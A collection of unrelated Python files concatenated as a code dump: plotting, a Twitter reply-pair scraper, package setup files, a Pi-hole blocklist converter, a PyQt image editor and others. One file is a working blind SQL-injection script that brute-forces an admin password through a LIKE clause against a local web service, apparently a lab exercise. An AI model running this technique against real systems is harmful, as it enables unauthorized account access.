compare_by_surrogate(data)
plot_function_surfaces()
# timingdatatocsv()
if __name__ == '__main__':
run()
|
import pandas as pa
import plotly
import plotly.graph_objects as go
path_random = r'C:\Users\AL\Desktop\test\test.csv'
test_data_df = pa.read_csv(path_random)
test_data_df.head()
# trace0 = Scatter(x=[1,2,3,4], y=[1,2,3,4])
# trace1 = Scatter(x=[1,2,3,4], y=[5,6,7,8])
# data = [trace0, trace1]
# plotly.offline.plot(data, filename='tfh.html')
trace = [go.Pie(labels=test_data_df.index.tolist(), values=test_data_df.score.tolist(), hole=0.2)]
fig = go.Figure(data=trace)
pyplot = plotly.offline.plot
pyplot(fig)
|
import tweepy
import random
import re
while True:
# ここに先程取得したAPIキーとトークンを入力
api_key = ""
api_secret_key = ""
access_token = ""
access_token_secret = ""
auth = tweepy.OAuthHandler(api_key, api_secret_key)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth_handler=auth, wait_on_rate_limit=True)
# botのツイートを除外するため,一般的なクライアント名を列挙
sources = ["TweetDeck", "Twitter Web Client", "Twitter for iPhone",
"Twitter for iPad", "Twitter for Android", "Twitter for Android Tablets",
"ついっぷる", "Janetter", "twicca", "Keitai Web", "Twitter for Mac"]
# ひらがな一文字で検索し,スクリーンネームを取得
words = list("あいうえおかきくけこさしすせそたちつてとなにぬねのはひふへほまみむめもやゆよらりるれろわをん")
screen_names = set()
for s in api.search(q=random.choice(words), lang='ja', result_type='recent', count=100, tweet_mode='extended'):
if s.source in sources:
screen_names.add(s.author.screen_name)
# ステータスidからステータスを得るためのdict
id2status = {}
# スクリーンネームからタイムラインを取得してツイートを保存.
# さらにリプライツイートであれば,リプライ先のスクリーンネームも取得
in_reply_to_screen_names = set()
for name in screen_names:
try:
for s in api.user_timeline(name, tweet_mode='extended', count=200):
# リンクもしくはハッシュタグを含むツイートは除外する
if "http" not in s.full_text and "#" not in s.full_text:
id2status[s.id] = s
if s.in_reply_to_screen_name is not None:
if s.in_reply_to_screen_name not in screen_names:
in_reply_to_screen_names.add(s.in_reply_to_screen_name)
except Exception as e:
continue
# リプライ先のスクリーンネームからタイムラインを取得してツイートを保存
for name in in_reply_to_screen_names:
try:
for s in api.user_timeline(name, tweet_mode='extended', count=200):
if "http" not in s.full_text and "#" not in s.full_text:
id2status[s.id] = s
except Exception as e:
continue
# 保存したツイートのリプライ先のツイートが保存されていれば,id2replyidのキーを元ツイートのid,値をリプライ先ツイートのidとする
id2replyid = {}
for _, s in id2status.items():
if s.in_reply_to_status_id in id2status:
id2replyid[s.in_reply_to_status_id] = s.id
# id2replyidのkey valueからstatusを取得し,ツイートペアをタブ区切りで保存
f = open("tweet_pairs.txt", "a")
for id, rid in id2replyid.items():
# 改行は半角スペースに置換
tweet1 = id2status[id].full_text.replace("\n", " ")
# スクリーンネームを正規表現を用いて削除
tweet1 = re.sub(r"@[0-9a-zA-Z_]{1,15} +", "", tweet1)
tweet2 = id2status[rid].full_text.replace("\n", " ")
tweet2 = re.sub(r"@[0-9a-zA-Z_]{1,15} +", "", tweet2)
f.write(tweet1+ "\t" + tweet2 + "\n")
f.close()
print("Write " + str(len(id2replyid)) + " pairs.")
# ツイート3組をタブ区切りで保存
# f = open("tweet_triples.txt", "a")
# for id, rid in id2replyid.items():
# if rid in id2replyid:
# tweet1 = id2status[id].full_text.replace("\n", " ")
# tweet1 = re.sub(r"@[0-9a-zA-Z_]{1,15} +", "", tweet1)
# tweet2 = id2status[rid].full_text.replace("\n", " ")
# tweet2 = re.sub(r"@[0-9a-zA-Z_]{1,15} +", "", tweet2)
# tweet3 = id2status[id2replyid[rid]].full_text.replace("\n", " ")
# tweet3 = re.sub(r"@[0-9a-zA-Z_]{1,15} +", "", tweet3)
# f.write(tweet1 + " SEP " + tweet2 + "\t" + tweet3 + "\n")
# f.close()
|
#!/usr/bin/env python3
from setuptools import setup
# from distutils.core import setup
with open('README.md') as f:
long_description = f.read()
setup(
name = 'py-mgr',
packages = ['py_mgr'],
version = '0.0.9',
description = 'administration of modules and plugin',
long_description=long_description,
long_description_content_type='text/markdown', # This is important!
url = 'https://github.com/FlavioLionelRita/py-mgr', # use the URL to the github repo
download_url = 'https://github.com/FlavioLionelRita/py-mgr/tarball/0.0.9',
keywords = ['manager', 'plugin'],
classifiers = [],
author = 'Flavio Lionel Rita',
author_email = 'flaviolrita@hotmail.com'
)
|
from setuptools import setup, find_packages
setup(
name='coinmarket-scraper',
version='0.0.1',
author='avery bostick',
packages=['src','tests'],
) |
def find_min_max(nums):
if nums[0]<nums[1]:
min = nums[0]
max = nums[1]
else:
min = nums[1]
max = nums[0]
for i in range(len(nums)-2):
if nums[i+2] < min:
min = nums[i+2]
elif nums[i+2] > max:
max = nums[i+2]
return (min, max)
def main():
print(find_min_max([3, 5, 1, 2, 4, 8]))
if __name__== "__main__":
main() |
a = list(input())
cnt = 0
x = 0
for i in range(len(a)-1):
if a[i] == a[i+1]:
cnt += 1
if x <= cnt:
x = cnt
elif a[i] != a[i+1]:
cnt = 0
print(x+1) |
import json
import sys
from collections import OrderedDict, defaultdict
from datetime import date
from pathlib import Path
from typing import Dict, List
class DomainBlocklistConverter:
INPUT_FILE = "pihole-google.txt"
PIHOLE_FILE = "google-domains"
UNBOUND_FILE = "pihole-google-unbound.conf"
ADGUARD_FILE = "pihole-google-adguard.txt"
CATEGORIES_PATH = "categories"
BLOCKLIST_ABOUT = "This blocklist helps to restrict access to Google and its domains. Contribute at https://github.com/nickspaargaren/no-google"
def __init__(self):
self.data: Dict[List] = OrderedDict()
self.timestamp: str = date.today().strftime("%Y-%m-%d")
def read(self):
"""
Read input file into `self.data`, a dictionary mapping category names to lists of member items.
"""
with open(self.INPUT_FILE, "r") as f:
category = None
for line in f:
line = line.strip()
if line.startswith("#"):
category = line.lstrip("# ")
self.data.setdefault(category, [])
else:
if category is None:
raise ValueError("Unable to store item without category")
self.data[category].append(line)
def dump(self):
"""
Output data in JSON format on STDOUT.
"""
print(json.dumps(self.data, indent=4))
def pihole(self):
"""
Produce blocklist for the Pi-hole.
"""
with open(self.PIHOLE_FILE, "w") as f:
f.write(f"# {self.BLOCKLIST_ABOUT}\n")
f.write(f"# Last updated: {self.timestamp}\n")
for category, entries in self.data.items():
f.write(f"# {category}\n")
for entry in entries:
f.write(f"0.0.0.0 {entry}\n")
def unbound(self):
"""
Produce blocklist for the Unbound DNS server.
https://github.com/nickspaargaren/no-google/issues/67
"""
with open(self.UNBOUND_FILE, "w") as f:
f.write(f"# {self.BLOCKLIST_ABOUT}\n")
f.write(f"# Last updated: {self.timestamp}\n")
for category, entries in self.data.items():
f.write(f"\n# Category: {category}\n")
for entry in entries:
f.write(f'local-zone: "{entry}" always_refuse\n')
def adguard(self):
"""
Produce blocklist for AdGuard.
"""
with open(self.ADGUARD_FILE, "w") as f:
f.write(f"! {self.BLOCKLIST_ABOUT}\n")
f.write(f"! Last updated: {self.timestamp}\n")
for category, entries in self.data.items():
f.write(f"! {category}\n")
for entry in entries:
f.write(f"||{entry}^\n")
def categories(self):
"""
Produce individual per-category blocklist files.
"""
def write_file(path, category, entries, line_prefix=""):
"""
Generic function to write per-category file in both flavours.
"""
with open(path, "w") as f:
f.write(f"# {self.BLOCKLIST_ABOUT}\n")
f.write(f"# Last updated: {self.timestamp}\n")
f.write(f"# {category}\n")
f.write(f"\n")
for entry in entries:
f.write(f"{line_prefix}{entry}\n")
for category, entries in self.data.items():
# Compute file names.
filename = category.replace(" ", "").lower()
filepath = Path(self.CATEGORIES_PATH).joinpath(filename)
text_file = filepath.with_suffix(".txt")
parsed_file = str(filepath) + "parsed"
# Write two flavours of per-category file.
write_file(text_file, category, entries, line_prefix="0.0.0.0 ")
write_file(parsed_file, category, entries)
def duplicates(self):
"""
Find duplicates in main source file.
"""
hashes = defaultdict(int)
for category, entries in self.data.items():
for entry in entries:
hashes[hash(entry)] += 1
for category, entries in self.data.items():
for entry in entries:
hashvalue = hash(entry)
if hashvalue in hashes:
count = hashes[hashvalue]
if count > 1:
print(
f"Domain {entry} found {count} times, please remove duplicate domains."
)
hashes[hashvalue] = 0
def run(action: str):
"""
Invoke different actions on converter engine.
"""
# Create converter instance and read input file.
converter = DomainBlocklistConverter()
converter.read()
# Invoke special action "json".
if action == "json":
converter.dump()
sys.exit()
# Either invoke specific action, or expand to all actions.
if action == "all":
subcommands = action_candidates
else:
subcommands = [action]
# Invoke all actions subsequently.
for action in subcommands:
print(f"Invoking subcommand '{action}'")
method = getattr(converter, action)
method()
if __name__ == "__main__":
# Read subcommand from command line, with error handling.
action_candidates = ["pihole", "unbound", "adguard", "categories"]
special_candidates = ["all", "duplicates", "json"]
subcommand = None
try:
subcommand = sys.argv[1]
except:
pass
if subcommand not in action_candidates + special_candidates:
print(
f"ERROR: Subcommand not given or invalid, please use one of {action_candidates + special_candidates}"
)
sys.exit(1)
# Invoke subcommand.
run(subcommand)
|
import httplib
import urllib
import json
def sql_injection():
username = "admin\" AND password LIKE \""
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
password = ""
while True:
end = True
for char in chars:
try_password = password + char
body = {
"username": username + try_password + "%",
"password": "abc"
}
params = json.dumps(body)
headers = {"Content-type":"application/json"}
conn = httplib.HTTPConnection("localhost:8080")
conn.request("POST", "/v1/user", params, headers)
res = conn.getresponse()
if res.read().find("already in use") != -1:
password = try_password
print password
conn.close()
end = False
break
conn.close()
if end:
print
print "Found password"
print password
break
if __name__ == "__main__":
sql_injection()
|
from kv_db_interface import KeyValueDatabaseInterface
import annoucement_pb2 as announcement_message
def main():
kv_db = KeyValueDatabaseInterface(connection_string="sqlite:///proto_buf.db")
message_to_serialize = announcement_message.Annoucement()
message_to_serialize.sender = "Mikey"
message_to_serialize.recipients.extend(['Joey', 'Sammy'])
message_to_serialize.message = "S.O.S."
print("The following the printed Protbuf object:")
print(message_to_serialize)
print("This is how it showed up serialized:")
print(message_to_serialize.SerializeToString())
print("Inserting the message...")
kv_db.insert("message1", message_to_serialize)
print("Retrieving the message...")
serialized_message_from_db = kv_db.get("message1").value
print("This is how it looks like in after it is retrieve from the database:")
print(serialized_message_from_db)
print("Deserializing...")
deserialized_object = announcement_message.Annoucement()
deserialized_object.ParseFromString(serialized_message_from_db)
print("Done. This is the deserialized message from the database:")
print(deserialized_object)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("Program ended by user.")
exit(0)
|
#!/usr/bin/env python3
"""
The initial use case for this script was needing a tool to append version numbers to all
entries within the FASTA file.
For example, if you start with a header lines like this:
>transcript1_comp4_path3
>transcript1_comp4_path5
And you run this script like this:
./append_to_fasta_header.py -i foo.fna -o bar.fna -s '.1'
Then the new file will have the following headers:
>transcript1_comp4_path3.1
>transcript1_comp4_path5.1
Author: Joshua Orvis (jorvis AT gmail)
"""
import argparse
import gzip
import re
import sys
def main():
parser = argparse.ArgumentParser( description='Append strings to the end of FASTA read headers')
## output file to be written
parser.add_argument('-i', '--input_file', type=str, required=True, help='Path to an input file to be read (gzip supported)' )
parser.add_argument('-o', '--output_file', type=str, required=False, help='Path to an output file to be created' )
parser.add_argument('-s', '--suffix', type=str, required=True, help='String to be appended to each sequence header' )
args = parser.parse_args()
linenum = 0
if args.output_file is None:
ofh = sys.stdout
else:
ofh = open( args.output_file, 'wt' )
if args.input_file.endswith('.gz'):
fh = gzip.open( args.input_file, 'rb')
is_compressed = True
else:
fh = open(args.input_file, 'rU')
is_compressed = False
for line in fh:
if is_compressed:
line = line.decode()
linenum += 1
if line.startswith('>'):
m = re.match('>(\S+)(.*)', line)
if m:
ofh.write(">{0}{1}{2}\n".format(m.group(1), args.suffix, m.group(2)))
else:
raise Exception("ERROR: Found a possible > entry with no identifier on line {0}".format(linenum))
else:
ofh.write(line)
ofh.close()
if __name__ == '__main__':
main()
|
from netapp.netapp_object import NetAppObject
class ProcessorComplexInfo(NetAppObject):
"""
Available information on the processor complex modules (PCMs)
in the shelf.
"""
_is_pcm_element_not_installed = None
@property
def is_pcm_element_not_installed(self):
"""
Indicates if PCM element has been installed. Will
be present only if the element is not installed, in
which case no further information will be provided.
"""
return self._is_pcm_element_not_installed
@is_pcm_element_not_installed.setter
def is_pcm_element_not_installed(self, val):
if val != None:
self.validate('is_pcm_element_not_installed', val)
self._is_pcm_element_not_installed = val
_pcm_element_no = None
@property
def pcm_element_no(self):
"""
PCM element number
"""
return self._pcm_element_no
@pcm_element_no.setter
def pcm_element_no(self, val):
if val != None:
self.validate('pcm_element_no', val)
self._pcm_element_no = val
_is_pcm_element_error = None
@property
def is_pcm_element_error(self):
"""
Indicates if there has been a failure in the PCM.
Will not be present if a PCM element is not installed.
"""
return self._is_pcm_element_error
@is_pcm_element_error.setter
def is_pcm_element_error(self, val):
if val != None:
self.validate('is_pcm_element_error', val)
self._is_pcm_element_error = val
@staticmethod
def get_api_name():
return "processor-complex-info"
@staticmethod
def get_desired_attrs():
return [
'is-pcm-element-not-installed',
'pcm-element-no',
'is-pcm-element-error',
]
def describe_properties(self):
return {
'is_pcm_element_not_installed': { 'class': bool, 'is_list': False, 'required': 'optional' },
'pcm_element_no': { 'class': int, 'is_list': False, 'required': 'required' },
'is_pcm_element_error': { 'class': bool, 'is_list': False, 'required': 'optional' },
}
|
#!/usr/bin/env python3
# Copyright (c) 2008-10 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 2 of the License, or
# version 3 of the License, or (at your option) any later version. It is
# provided for educational purposes and is distributed in the hope that
# it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
# the GNU General Public License for more details.
import os
import platform
import sys
from PyQt5.Qt import QT_VERSION_STR, PYQT_VERSION_STR
from PyQt5.QtCore import (
Qt,
QSettings,
QByteArray,
QTimer,
QFile,
QFileInfo,
)
from PyQt5.QtGui import (
QImage,
QImageReader,
QImageWriter,
QKeySequence,
QIcon,
QPainter,
QPixmap,
)
from PyQt5.QtPrintSupport import QPrinter, QPrintDialog
from PyQt5.QtWidgets import (
QApplication,
QMainWindow,
QDockWidget,
QLabel,
QMessageBox,
QSpinBox,
QFrame,
QListWidget,
QAction,
QActionGroup,
QFileDialog,
QInputDialog,
)
from gui.mainWindow import newimagedlg, helpform
import gui.mainWindow.qrc_resources
__version__ = "1.0.1"
class MainWindow(QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.image = QImage()
self.dirty = False
self.filename = None
self.mirroredvertically = False
self.mirroredhorizontally = False
self.imageLabel = QLabel()
self.imageLabel.setMinimumSize(200, 200)
self.imageLabel.setAlignment(Qt.AlignCenter)
self.imageLabel.setContextMenuPolicy(Qt.ActionsContextMenu)
self.setCentralWidget(self.imageLabel)
logDockWidget = QDockWidget("Log", self)
logDockWidget.setObjectName("LogDockWidget")
logDockWidget.setAllowedAreas(Qt.LeftDockWidgetArea |
Qt.RightDockWidgetArea)
self.listWidget = QListWidget()
logDockWidget.setWidget(self.listWidget)
self.addDockWidget(Qt.RightDockWidgetArea, logDockWidget)
self.printer = None
self.sizeLabel = QLabel()
self.sizeLabel.setFrameStyle(
QFrame.StyledPanel | QFrame.Sunken)
status = self.statusBar()
status.setSizeGripEnabled(False)
status.addPermanentWidget(self.sizeLabel)
status.showMessage("Ready", 5000)
fileNewAction = self.createAction(
"&New...",
self.fileNew,
QKeySequence.New,
"filenew",
"Create an image file")
fileOpenAction = self.createAction(
"&Open...",
self.fileOpen,
QKeySequence.Open,
"fileopen",
"Open an existing image file")
fileSaveAction = self.createAction(
"&Save",
self.fileSave,
QKeySequence.Save,
"filesave",
"Save the image")
fileSaveAsAction = self.createAction(
"Save &As...",
self.fileSaveAs,
icon="filesaveas",
tip="Save the image using a new name")
filePrintAction = self.createAction(
"&Print",
self.filePrint,
QKeySequence.Print,
"fileprint",
"Print the image")
fileQuitAction = self.createAction(
"&Quit",
self.close,
"Ctrl+Q",
"filequit",
"Close the application")
editInvertAction = self.createAction(
"&Invert",
self.editInvert,
"Ctrl+I",
"editinvert",
"Invert the image's colors",
True,
"toggled")
editSwapRedAndBlueAction = self.createAction(
"Sw&ap Red and Blue",
self.editSwapRedAndBlue,
"Ctrl+A",
"editswap",
"Swap the image's red and blue color components",
True,
"toggled")
editZoomAction = self.createAction(
"&Zoom...",
self.editZoom,
"Alt+Z",
"editzoom",
"Zoom the image")
mirrorGroup = QActionGroup(self)
editUnMirrorAction = self.createAction(
"&Unmirror",
self.editUnMirror,
"Ctrl+U",
"editunmirror",
"Unmirror the image",
True,
"toggled")
mirrorGroup.addAction(editUnMirrorAction)
editMirrorHorizontalAction = self.createAction(
"Mirror &Horizontally",
self.editMirrorHorizontal,
"Ctrl+H",
"editmirrorhoriz",
"Horizontally mirror the image",
True,
"toggled")
mirrorGroup.addAction(editMirrorHorizontalAction)
editMirrorVerticalAction = self.createAction(
"Mirror &Vertically",
self.editMirrorVertical,
"Ctrl+V",
"editmirrorvert",
"Vertically mirror the image",
True,
"toggled")
mirrorGroup.addAction(editMirrorVerticalAction)
editUnMirrorAction.setChecked(True)
helpAboutAction = self.createAction(
"&About Image Changer",
self.helpAbout)
helpHelpAction = self.createAction(
"&Help",
self.helpHelp,
QKeySequence.HelpContents)
self.fileMenu = self.menuBar().addMenu("&File")
self.fileMenuActions = (
fileNewAction,
fileOpenAction,
fileSaveAction,
fileSaveAsAction,
None,
filePrintAction,
fileQuitAction)
self.fileMenu.aboutToShow.connect(self.updateFileMenu)
# self.connect(self.fileMenu, SIGNAL("aboutToShow()"),
# self.updateFileMenu)
editMenu = self.menuBar().addMenu("&Edit")
self.addActions(editMenu,(editInvertAction, editSwapRedAndBlueAction, editZoomAction))
mirrorMenu = editMenu.addMenu(
QIcon(":/editmirror.png"),
"&Mirror")
self.addActions(mirrorMenu,(editUnMirrorAction,editMirrorHorizontalAction,editMirrorVerticalAction))
helpMenu = self.menuBar().addMenu("&Help")
self.addActions(helpMenu, (helpAboutAction, helpHelpAction))
fileToolbar = self.addToolBar("File")
fileToolbar.setObjectName("FileToolBar")
self.addActions(fileToolbar,(fileNewAction, fileOpenAction, fileSaveAsAction))
editToolbar = self.addToolBar("Edit")
editToolbar.setObjectName("EditToolBar")
self.addActions(editToolbar,(editInvertAction,editSwapRedAndBlueAction,editUnMirrorAction,editMirrorVerticalAction,editMirrorHorizontalAction))
self.zoomSpinBox = QSpinBox()
self.zoomSpinBox.setRange(1, 400)
self.zoomSpinBox.setSuffix(" %")
self.zoomSpinBox.setValue(100)
self.zoomSpinBox.setToolTip("Zoom the image")
self.zoomSpinBox.setStatusTip(self.zoomSpinBox.toolTip())
self.zoomSpinBox.setFocusPolicy(Qt.NoFocus)
self.zoomSpinBox.valueChanged[int].connect(self.showImage)
editToolbar.addWidget(self.zoomSpinBox)
self.addActions(self.imageLabel,(editInvertAction,editSwapRedAndBlueAction,editUnMirrorAction,editMirrorVerticalAction,editMirrorHorizontalAction))
self.resetableActions = ((editInvertAction, False),
(editSwapRedAndBlueAction, False),
(editUnMirrorAction, True))
settings = QSettings()
self.recentFiles = settings.value("RecentFiles") or []
self.restoreGeometry(
settings.value("MainWindow/Geometry", QByteArray()))
self.restoreState(
settings.value("MainWindow/State", QByteArray()))
self.setWindowTitle("Image Changer")
self.updateFileMenu()
QTimer.singleShot(0, self.loadInitialFile)
def createAction(self, text, slot=None, shortcut=None, icon=None,
tip=None, checkable=False, signal="triggered"):
action = QAction(text, self)
if icon is not None:
action.setIcon(QIcon(":/{}.png".format(icon)))
if shortcut is not None:
action.setShortcut(shortcut)
if tip is not None:
action.setToolTip(tip)
action.setStatusTip(tip)
if slot is not None:
# self.connect(action, SIGNAL(signal), slot)
getattr(action, signal).connect(slot)
if checkable:
action.setCheckable(True)
return action
def addActions(self, target, actions):
for action in actions:
if action is None:
target.addSeparator()
else:
target.addAction(action)
def closeEvent(self, event):
if self.okToContinue():
settings = QSettings()
settings.setValue("LastFile", self.filename)
settings.setValue("RecentFiles", self.recentFiles or [])
settings.setValue("MainWindow/Geometry", self.saveGeometry())
settings.setValue("MainWindow/State", self.saveState())
else:
event.ignore()
def okToContinue(self):
if self.dirty:
reply = QMessageBox.question(
self,
"Image Changer - Unsaved Changes",
"Save unsaved changes?",
QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel)
if reply == QMessageBox.Cancel:
return False
elif reply == QMessageBox.Yes:
return self.fileSave()
return True
def loadInitialFile(self):
settings = QSettings()
fname = settings.value("LastFile")
if fname and QFile.exists(fname):
self.loadFile(fname)
def updateStatus(self, message):
self.statusBar().showMessage(message, 5000)
self.listWidget.addItem(message)
if self.filename:
self.setWindowTitle("Image Changer - {}[*]".format(
os.path.basename(self.filename)))
elif not self.image.isNull():
self.setWindowTitle("Image Changer - Unnamed[*]")
else:
self.setWindowTitle("Image Changer[*]")
self.setWindowModified(self.dirty)
def updateFileMenu(self):
self.fileMenu.clear()
self.addActions(self.fileMenu, self.fileMenuActions[:-1])
current = self.filename
recentFiles = []
for fname in self.recentFiles:
if fname != current and QFile.exists(fname):
recentFiles.append(fname)
if recentFiles:
self.fileMenu.addSeparator()
for i, fname in enumerate(recentFiles):
action = QAction(
QIcon(":/icon.png"),
"&{} {}".format(i + 1, QFileInfo(fname).fileName()), self)
action.setData(fname)
action.triggered.connect(self.loadFile)
# self.connect(action, SIGNAL("triggered()"),
# self.loadFile)
self.fileMenu.addAction(action)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.fileMenuActions[-1])
def fileNew(self):
if not self.okToContinue():
return
dialog = newimagedlg.NewImageDlg(self)
if dialog.exec_():
self.addRecentFile(self.filename)
self.image = QImage()
for action, check in self.resetableActions:
action.setChecked(check)
self.image = dialog.image()
self.filename = None
self.dirty = True
self.showImage()
self.sizeLabel.setText("{} x {}".format(
self.image.width(), self.image.height()))
self.updateStatus("Created new image")
def fileOpen(self):
if not self.okToContinue():
return
dir_ = (os.path.dirname(self.filename)
if self.filename is not None else ".")
formats = (
["*.{}".format(format.data().decode("ascii").lower())
for format in QImageReader.supportedImageFormats()]
)
filter = "Image files ({})".format(" ".join(formats))
print(filter)
fdialog_tuple = QFileDialog.getOpenFileName(
self,
"Image Changer - Choose Image",
dir_,
filter)
fname = fdialog_tuple[0]
if fname:
self.loadFile(fname)
def loadFile(self, fname=None):
if fname is None:
action = self.sender()
if isinstance(action, QAction):
fname = action.data()
if not self.okToContinue():
return
else:
return
if fname:
if isinstance(fname, tuple):
fname = fname[0]
# print (fname)
# import pdb
# pdb.set_trace()
self.filename = None
image = QImage(fname)
if image.isNull():
message = "Failed to read {}".format(fname)
else:
self.addRecentFile(fname)
self.image = QImage()
for action, check in self.resetableActions:
action.setChecked(check)
self.image = image
self.filename = fname
self.showImage()
self.dirty = False
self.sizeLabel.setText("{} x {}".format(
image.width(), image.height()))
message = "Loaded {}".format(os.path.basename(fname))
self.updateStatus(message)
def addRecentFile(self, fname):
if fname is None:
return
if fname not in self.recentFiles:
self.recentFiles = [fname] + self.recentFiles[:8]
def fileSave(self):
if self.image.isNull():
return True
if self.filename is None:
return self.fileSaveAs()
else:
if self.image.save(self.filename, None):
self.updateStatus("Saved as {}".format(self.filename))
self.dirty = False
return True
else:
self.updateStatus("Failed to save {}".format(
self.filename))
return False
def fileSaveAs(self):
if self.image.isNull():
return True
fname = self.filename if self.filename is not None else "."
formats = (["*.{}".format(format.data().decode("ascii").lower())
for format in QImageWriter.supportedImageFormats()])
fdialog_tuple = QFileDialog.getSaveFileName(
self,
"Image Changer - Save Image",
fname,
"Image files ({})".format(" ".join(formats)))
fname = fdialog_tuple[0]
if fname:
if "." not in fname:
fname += ".png"
self.addRecentFile(fname)
self.filename = fname
return self.fileSave()
return False
def filePrint(self):
if self.image.isNull():
return
if self.printer is None:
self.printer = QPrinter(QPrinter.HighResolution)
self.printer.setPageSize(QPrinter.Letter)
form = QPrintDialog(self.printer, self)
if form.exec_():
painter = QPainter(self.printer)
rect = painter.viewport()
size = self.image.size()
size.scale(rect.size(), Qt.KeepAspectRatio)
painter.setViewport(rect.x(), rect.y(), size.width(),
size.height())
painter.drawImage(0, 0, self.image)
def editInvert(self, on):
if self.image.isNull():
return
self.image.invertPixels()
self.showImage()
self.dirty = True
self.updateStatus("Inverted" if on else "Uninverted")
def editSwapRedAndBlue(self, on):
if self.image.isNull():
return
self.image = self.image.rgbSwapped()
self.showImage()
self.dirty = True
self.updateStatus(("Swapped Red and Blue"
if on else "Unswapped Red and Blue"))
def editUnMirror(self):
if self.image.isNull():
return
if self.mirroredhorizontally:
self.editMirrorHorizontal(False)
if self.mirroredvertically:
self.editMirrorVertical(False)
def editMirrorHorizontal(self, on):
if self.image.isNull():
return
self.image = self.image.mirrored(True, False)
self.showImage()
self.mirroredhorizontally = not self.mirroredhorizontally
self.dirty = True
self.updateStatus(("Mirrored Horizontally"
if on else "Unmirrored Horizontally"))
def editMirrorVertical(self, on):
if self.image.isNull():
return
self.image = self.image.mirrored(False, True)
self.showImage()
self.mirroredvertically = not self.mirroredvertically
self.dirty = True
self.updateStatus(("Mirrored Vertically"
if on else "Unmirrored Vertically"))
def editZoom(self):
if self.image.isNull():
return
percent, ok = QInputDialog.getInt(
self,
"Image Changer - Zoom", "Percent:",
self.zoomSpinBox.value(), 1, 400)
if ok:
self.zoomSpinBox.setValue(percent)
def showImage(self, percent=None):
if self.image.isNull():
return
if percent is None:
percent = self.zoomSpinBox.value()
factor = percent / 100.0
width = self.image.width() * factor
height = self.image.height() * factor
image = self.image.scaled(width, height, Qt.KeepAspectRatio)
self.imageLabel.setPixmap(QPixmap.fromImage(image))
def helpAbout(self):
QMessageBox.about(
self,
"About Image Changer",
"""<b>Image Changer</b> v {0}
<p>Copyright © 2008-10 Qtrac Ltd.
All rights reserved.
<p>This application can be used to perform
simple image manipulations.
<p>Python {1} - Qt {2} - PyQt {3} on {4}""".format(
__version__, platform.python_version(),
QT_VERSION_STR, PYQT_VERSION_STR,
platform.system()))
def helpHelp(self):
form = helpform.HelpForm("index.html", self)
form.show()
def main():
app = QApplication(sys.argv)
app.setOrganizationName("Qtrac Ltd.")
app.setOrganizationDomain("qtrac.eu")
app.setApplicationName("Image Changer")
app.setWindowIcon(QIcon(":/icon.png"))
form = MainWindow()
form.show()
app.exec_()
main()
|
import sys
import numpy as np
import pandas as pd
from google.cloud import bigquery
import pandas_gbq as gbq
def shRNAPreprocess(input_data, col_name):
'''
Description:Preprocesses DEPMAP DEMETER2 data and converts into it long format
Inputs:
input_data: dataframe,either gene expression, cnv or gene effect
col_name: string, the colunm name for measurements e.g CNA
Output:
long_table: dataframe, long format of the input data given in wide format
'''
data=input_data.copy(deep=False)
data=pd.DataFrame.transpose(data)
id='CCLE_ID'
long_table=CRISPRPreprocess(data, col_name, id)
return(long_table)
def CRISPRPreprocess(input_data, col_name, id='DepMap_ID'):
'''
Description:Preprocesses DEPMAP CRISPR data and converts into into long format
Inputs:
input_data: dataframe,either gene expression, cnv or gene effect
col_name: string, the colunm name for measurements e.g CNA
Output:
long_table: dataframe, long format of the input data given in wide format
'''
data=input_data.copy(deep=False)
gene_names= [colname.split(' (')[0] for colname in data.columns]
entrez_ids= [(colname.split('(', 1)[1].split(')')[0]) for colname in data.columns]
if 'NA' in entrez_ids:
index_rem_list = [ i for i in range(len(entrez_ids)) if entrez_ids[i] == 'NA' ]
for index in sorted(index_rem_list, reverse=True):
del entrez_ids[index]
del gene_names[index]
data.drop(data.columns[index_rem_list], axis=1, inplace=True)
if 'nan' in entrez_ids:
index_rem_list = [ i for i in range(len(entrez_ids)) if entrez_ids[i] == 'nan' ]
for index in sorted(index_rem_list, reverse=True):
del entrez_ids[index]
del gene_names[index]
data.drop(data.columns[index_rem_list], axis=1, inplace=True)
gene_entrez_map=dict(zip(gene_names, entrez_ids))
data.columns=gene_names
long_table = data.unstack().reset_index()
long_table = long_table.set_axis(['Hugo_Symbol', id, col_name], axis=1, inplace=False)
long_table['Entrez_ID']=[gene_entrez_map.get(x) for x in long_table['Hugo_Symbol']]
# long_table['Entrez_ID']= pd.to_numeric(long_table['Entrez_ID'])
long_table=long_table[['Entrez_ID','Hugo_Symbol',id, col_name]]
return(long_table)
|
from .dataset import *
from .coco import *
from .balloon import *
from .fintabnet import *
|
# The MIT License (MIT)
#
# Copyright (c) 2018 stanwood GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import base64
import json
import logging
import re
from google.appengine.api import (
app_identity,
urlfetch,
)
import dateutil.parser
class OcrModel(object):
class BaseText(object):
def __init__(self, pattern):
self.pattern = pattern
def search(self, text):
try:
return self.pattern.search(text).group(0).strip()
except AttributeError:
return None
class TextAfter(BaseText):
